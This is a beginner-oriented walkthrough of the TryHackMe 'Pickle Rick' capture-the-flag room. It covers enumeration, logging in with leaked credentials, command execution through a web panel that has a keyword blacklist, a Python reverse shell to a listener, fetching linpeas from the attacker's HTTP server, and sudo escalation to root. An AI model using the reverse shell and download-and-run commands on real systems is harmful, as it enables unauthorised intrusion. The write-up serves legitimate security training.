Skip to main content

Tryhackme

Pickle Rick

Pickle Rick
Photo by Miracle Seltzer / Unsplash

Hi! This is my first write-up/walk through. I tried to make it as beginner friendly as possible. For people that only look for a quick solution, this is way to detailed and annoying to read. For all the beginners that read this, I hope it fits your needs and helps.
Thanks to TryHackMe for this awesome room! You can find it here.

First step

We create a variable with our IP which makes things a lot easier (thanks Mr.Hammond). Replace "TARGETIP" with the ip address of your target machine.
The IP can be replaced in every command by $IP as we will see below. Note that if multiple terminals are being used, the export command has to be run in all terminals if it is to be used. I would suggest to use terminator or similar tools.

export IP=TARGETIP

First scan

-p- scans all the TCP ports
-v verbose, gives some feedback during the scan
-oN writes the results of the scan to a file

nmap -p- -v -oN nmap/ports $IP

Second scan

-p 22,80 as we found out which ports are open, we do our main detection scans only on those ports. It could also be done in one scan, but depending on the situation this will be better, because we are not scanning 65535 ports for their services etc.

-A for OS detection, version detection, script scanning (nmap has some inbuilt scripts) and traceroute. If only one scan is being run with -p- you could use -sV instead of -A for service and version info

nmap -p 22,80 -v -A -oN nmap/init $IP

What we found

Now we know that we have:

  • ssh port open with OpenSSH 7.2p2 on Ubuntu
  • http port open with Apache/2.4.18

Whats next?

More enumeration! I have struggled on many boxes because I was not enumerating enough, it may be overkill for some boxes, but I think it is a good practice and habit.
While the enumeration is going on, we can visit the webpage an manually search for some hints.

Brute forcing SSH with hydra could be an option too, since the box has a theme we could try the usernames rick or morty.

Nikto

Nikto is a vulnerability scanner for web servers. I like it because it gives a quick overview.
Since we know that the server is running a web server (Apache port 80), we will give it a shot.

nikto -h http://$IP

Nikto returns two interesting things:

  • robots.txt contains no 'disallowed' entries (in some cases nikto does not return anything about robots.txt, I do not know why)
  • Admin login page found at /login.php

Gobuster (directory enumeration)

This time we will enumerate the folders of the site hosted on port 80 via Apache, which we will do with gobuster.

gobuster has multiple options, since we want to enumerate directories we use 'dir'

-u specifies the url
-w specifies the word list (you can use other word lists here)
-x specifies the extensions for files we are looking for

gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,php,js,sh,cgi,py,txt,py,css

Gobuster will run for a long time with the list I chose.

We get the following results fairly quick:

/.php                 (Status: 403) [Size: 292]
/index.html           (Status: 200) [Size: 1062]
/.html                (Status: 403) [Size: 293]
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 315] [--> http://10.10.248.142/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/robots.txt           (Status: 200) [Size: 17]

Checking out the website

With the results from gobuster in mind we are taking a look at the website. I suggest to always manually check ip/robots.txt and ip/.htaccess

Then inspect the sites you have (right click then inspect or view source) and manually check the source code for comments or other hints, bugs or flaws.

If pictures are available download them and check for steganography (data hidden in images)

For .htaccess with have a 'permission denied', so we take a look at robots.txt which only contains '***************'. Maybe a username or password, we will remember it for now.

Main page

When inspecting the main page we find a comment that says:

'Note to self, remember username! Username: R1ckRul3s'

Further more we see that the big image is saved in the /assets folder. Remember stego, so we will download and check it.
Right click the image and chose 'copy image link'

wget http://IP/assets/rickandmorty.jpeg

Before we check for stego, we do a quick check of the metadata, I use either exif or exiftool.

exif rickandmorty.jpg
exiftool rickandmorty.jpg

There are multiple tools to detect and extract data from images like:

  • steghide
  • stegolsb
  • stegseek
  • binwalk
binwalk rickandmorty.jpeg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------



stegseek --seed rickandmorty.jpeg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.99% (4294455000 seeds)           
[!] error: Could not find a valid seed.

Seems like the picture contains nothing.

login.php

Lets have a look at the login page /login.php

Looks like a normal login page and we have a picture again.

We download the picture again

wget http://IP/assets/portal.jpg

While stegseek is running we try to log in. We could use hydra here but we have a username and the string from robots.txt
We try our luck with the credentials from the main page comment and the robots.txt, 'R1ckRul3s:****************'.

Bingo! We logged in successfully.

We land on a page that seems to execute commands, and up top we can navigate other pages but they all lead to /denied.php.

The next steps:

  • inspect all the pages
  • download images and check for stego
  • play around with the command line

The order here is not important, the most intriguing is of course the command line, so we will try and execute some commands.

ls

Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Since the ls command works, lets get an overview of the users with

ls /home

rick
ubuntu

Since we have a username that seems to belong to rick and a password we can try to ssh with rick.

ssh rick@$IP

The result is rather bad, we can not ssh with username:password but need a key.

So back to the files that are in the root directory of the page.

'Sup3rS3cretPickl3Ingred.txt' is what we want so we try:

cat Sup3rS3cretPickl3Ingred.txt

Another disappointing result. It seems the commands we can use are limited. Lucky for us there are some alternatives that we can try.

In our case here we can use:

less Sup3rS3cretPickl3Ingred.txt

Yay! First ingredient found! But there is another interesting file.

less clue.txt

Look around the file system for the other ingredient.

Lets search. Since we know that there are two users in the home directory, and one of them seems interesting lets look into it:

ls /home/rick

second ingredients

seems we can not access 'second ingredients', lets have a look at the permissions:

ls -lah /home/rick/

total 12K
drwxrwxrwx 2 root root 4.0K Feb 10  2019 .
drwxr-xr-x 4 root root 4.0K Feb 10  2019 ..
-rwxrwxrwx 1 root root   13 Feb 10  2019 second ingredients

Interesting, file is owned by root and in the root user group, so we have no power here...for now.

Lets go back to our to do-list and leave the command line for know.

We start by inspecting the page source code.

First page is a hit, we see a comment in the code containing a weird string.

'Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0=='

The structure of this string looks like base64, which can be decoded quite easily.

This can be done via cyberchef (very useful) or via the Linux command line like so:

echo 'base64string' | base64 -d

In this case we use cyberchef. Decoding the string yields another base64 string, and again, and again...Once decoded we get '****** ****'.

So we continue inspecting the /denied.php page, but there seems to be nothing but an image. We try stego again:

wget http://10.10.51.104/assets/picklerick.gif

binwalk picklerick.gif

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             GIF image data, version "89a", 480 x 270

Nothing.

Reverse shell

So back to the command line. We try to figure out if we can leverage id to get a reverse shell.

There are multiple ways to get one and since the commands we can input are limited we will have a look at portal.php. We do this the same way we looked into the text file.

less portal.php

Because of the code this looks very weird in the output window, so I suggest to right click and then view source code. In this new tab we scroll down until we find the function that controls the input for the command line:

<?php
      function contains($str, array $arr)
      {
          foreach($arr as $a) {
              if (stripos($str,$a) !== false) return true;
          }
          return false;
      }
      // Cant use cat
      $cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
      if(isset($_POST["command"])) {
        if(contains($_POST["command"], $cmds)) {
          echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";
        } else {
          $output = shell_exec($_POST["command"]);
          echo "</br><pre>$output</pre>";
        }
      }

    ?>

Here we see that we can not use "cat", "head", "more", "tail", "nano", "vim", "vi". Some of these commands would have been useful to get a reverse shell. But there are alternatives.

I really like python and python is installed on almost any Linux machine so we try python. To test if python is available we can execute a python command with the '-c' tag. We can pass python syntax as a string to python which will be executed directly. To test we just create a print statement that returns any text. If that works, we know python is installed and we can use it.
Note that you have to use different sets of quotes for the string you pass with the -c tag and the print statement.
If 'python3' does not work you can try 'python'

python3 -c 'print("test")'

test

Nice we have python. Before we can run a reverse shell, we have to create a listener on our machine so that the shell from the server can connect to our machine. We do this with netcat:

nc -lnvp 4444

listening on [any] 4444 ...

-l for listen mode
-n for numeric-only IP addresses and no DNS
-v verbose for more information while netcat runs
-p for the port we are listening on. (You can take any free port, I use 4444)

Now that our machine is listening we will create the reverse shell. This site is very handy for reverse shells.

For python we use:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOURIP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

If you are using vpn on your personal machine, your ip is the one from tun0. (you can list your interfaces with the 'ifconfig' or 'ip a' commands).
Use the command as all the previous commands on the portal page and hit execute. The terminal which is running your netcat listener should now look like this:

nc -lnvp 4444
listening on [any] 4444 ...
connect to [YOURIP] from (UNKNOWN) [SERVERIP] 37514
/bin/sh: 0: can't access tty; job control turned off
$

Enumerating...again

The first thing to do with a reverse shell is linpeas.
Linpeas is an amazing script we can find here.

To get this script to the server we use python again, although there are other possibilities.
With python we create a local http server and the we use 'wget' on the target to download linpeas.sh.

To host a server with python, we navigate to the folder which contains linpeas and enter the following:

-m allows us to run a module, in our case http.server, the port is specified at the end

python -m http.server 1337

In our reverse shell we will first navigate to /dev/shm (shared memory). In this folder with should usually have the permission to execute files. In this folder we run:

wget http://YOURIP:1337/linpeas.sh

It is important to specify the port, otherwise wget uses the standard port which is 80.

With the file now on our target, we need to make it executable:

chmod +x linpeas.sh

and then execute the file like so:

./linpeas.sh

The script takes some time to run, so we start reading the results while it executes.
There is a lot of information to read through, and a lot of it is hard to understand as a beginner.

In our case we are interested in

User www-data may run the following commands on ip-10-10-51-104.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

This means the www-data user can run every command as sudo without entering a password.

Privilege escalation

To become root we enter

sudo bash
whoami
root

We own the box. Now we have power!

First we check the second ingredients in the /home/rick folder

To cat 'second ingredients' we have to use quotes because of the space, otherwise it will be treated as two separate files and the command will not work.

cat 'second ingredients'

Only one more to go!

For the last ingredient we should check the root folder.

cd /root
ls

3rd.txt
snap

cat 3rd.txt

Nice we got it!